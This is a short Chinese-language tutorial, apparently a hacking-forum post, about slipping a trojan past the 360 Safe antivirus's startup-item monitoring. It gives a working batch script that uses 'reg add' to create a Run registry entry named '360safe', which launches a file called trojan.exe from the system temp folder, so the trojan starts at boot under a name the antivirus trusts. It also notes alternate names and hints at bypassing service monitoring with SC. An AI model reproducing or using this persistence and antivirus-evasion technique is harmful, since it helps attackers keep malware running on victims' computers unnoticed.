这个主要针对360对启动项的监控,至于突破服务监控感兴趣的可以通过SC来解决!
原理:木马启动项改成360已知的安全项
@echo off
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v 360safe /t REG_SZ /d "%SystemRoot%\temp\木马.exe" /f
echo 看看启动项里是不是多了一个木马.exe,可360并没有提示
pause
exit
其中360safe名字还可改为改成360antiarp,效果一样!
REG ADD命令:
/v 所选项之下要添加的值名
/f 不用提示强行改写现有注册表项